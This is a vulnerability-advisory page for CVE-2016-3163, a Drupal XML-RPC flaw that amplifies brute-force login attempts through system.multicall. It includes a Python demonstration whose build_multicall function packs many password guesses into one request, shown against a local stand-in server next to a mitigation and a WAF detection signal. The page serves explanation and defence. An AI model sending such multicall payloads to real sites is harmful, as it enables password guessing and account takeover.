
CVE-2016-3163:
Drupal Brute force amplification attacks via XML-RPC

CVSS Score: 7.5 (CVSS 3.0)

Basic Information

EPSS Score: 0.73996%
CWE: -
Published: 5/17/2022
Updated: 5/3/2024
KEV Status: No
Technology: PHP

Technical Details

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Package Name    Ecosystem   Vulnerable Versions   First Patched Version
drupal/core     composer    >= 7.0, < 7.43        7.43
drupal/core     composer    >= 6.0, < 6.38        6.38
drupal/drupal   composer    >= 7.0, < 7.43        7.43
drupal/drupal   composer    >= 6.0, < 6.38        6.38

Vulnerability Intelligence

Root Cause Analysis (Miggo AI)

The weakness is in Drupal core's XML-RPC server, which accepts a system.multicall request that bundles many calls into one HTTP request and executes every one of them, including repeated calls to the same method. When the called method validates credentials, a single request turns into one password-guessing attempt per bundled call; that is the amplification the advisory describes. In Drupal 6 the target ships in core: the Blog API module registers its methods through hook_xmlrpc, and handlers such as blogapi_blogger_get_user_info authenticate the supplied username and password on every call with no flood control, which is why the security advisory names Drupal 6 core as vulnerable through blogapi. Drupal 7 no longer ships blogapi in core, but its XML-RPC server behaves the same way, and any contributed module exposing a credential-checking method provides an equivalent target, so the fix shipped in both 6.38 and 7.43. The patched code itself is not reproduced on this page.
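The following is an added example written for this page, not Miggo's code and not Drupal's, that shows the mechanism in the root cause analysis end to end: the attacker packs one password guess per sub-call into a single system.multicall request, the vulnerable dispatcher runs all of them, and a hardened dispatcher refuses a multicall that repeats the same method. The method name blogger.getUserInfo, its (appkey, username, password) parameter order, the user table, the wordlist and the per_method_limit check are assumptions made for the example; the check is one representative mitigation, not Drupal's actual patch.

```python
import xmlrpc.client
from collections import Counter

# Constructed sample data (not from the page): one account and a short wordlist.
USERS = {"admin": "s3cretP@ss"}
GUESSES = ["123456", "password", "admin", "letmein", "s3cretP@ss", "qwerty"]

# Assumed method name and parameter order (appkey, username, password) for a
# Blog API style credential-checking method; the appkey value is arbitrary.
TARGET_METHOD = "blogger.getUserInfo"


def build_multicall(username, guesses):
    """Attacker side: one system.multicall request carrying one TARGET_METHOD
    call per password guess. N guesses travel in a single HTTP request, so a
    per-request rate limit sees one request while the server checks N passwords."""
    calls = [
        {"methodName": TARGET_METHOD, "params": ["appkey", username, guess]}
        for guess in guesses
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def check_credentials(appkey, username, password):
    """Stand-in for the server's credential check behind TARGET_METHOD.
    Like the unpatched Drupal 6 handler described above, it has no flood control."""
    if USERS.get(username) == password:
        return {"userid": 1, "nickname": username}
    raise xmlrpc.client.Fault(403, "Wrong username or password.")


METHODS = {TARGET_METHOD: check_credentials}


def handle_request(xml, per_method_limit=None):
    """Server side: parse and dispatch one XML-RPC request.

    per_method_limit=None reproduces the vulnerable behaviour: every sub-call
    of a multicall is executed. With a limit, a multicall that names the same
    method more often than the limit is refused before any sub-call runs. This
    removes the amplification; a per-account flood limit inside the credential
    check is the second layer a hardened site keeps (assumed design, not the
    Drupal patch)."""
    params, method = xmlrpc.client.loads(xml)
    if method != "system.multicall":
        return METHODS[method](*params)
    calls = params[0]
    if per_method_limit is not None:
        counts = Counter(call["methodName"] for call in calls)
        repeated = [name for name, n in counts.items() if n > per_method_limit]
        if repeated:
            raise xmlrpc.client.Fault(-32602, "too many calls to " + ", ".join(repeated))
    results = []
    for call in calls:
        try:
            # Standard multicall encoding: success is a one-element array,
            # failure is a fault struct.
            results.append([METHODS[call["methodName"]](*call["params"])])
        except xmlrpc.client.Fault as fault:
            results.append({"faultCode": fault.faultCode, "faultString": fault.faultString})
    return results


def guessed_password(username, guesses):
    """Run the attack against the vulnerable dispatcher and read the multicall
    response: the guess whose sub-call did not come back as a fault is the password."""
    results = handle_request(build_multicall(username, guesses))
    for guess, result in zip(guesses, results):
        if isinstance(result, list):
            return guess
    return None


def hardened_rejects(username, guesses):
    """Same request against the dispatcher with per_method_limit=1: True if the
    whole multicall was refused before any password was checked."""
    try:
        handle_request(build_multicall(username, guesses), per_method_limit=1)
    except xmlrpc.client.Fault:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable server leaked:", guessed_password("admin", GUESSES))
    print("hardened server refused multicall:", hardened_rejects("admin", GUESSES))
```

The same count of repeated methodName values inside one system.multicall body is the signal a WAF rule for this issue keys on at the edge: a legitimate Blog API client rarely needs more than one credential check per request, while a brute-force run needs hundreds.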

WAF Protection Rules

WAF Rule

The XML-RPC system in Drupal 6.x before 6.38 and 7.x before 7.43 might make it easier for remote attackers to conduct brute-force attacks via a large number of calls made at once to the same method.
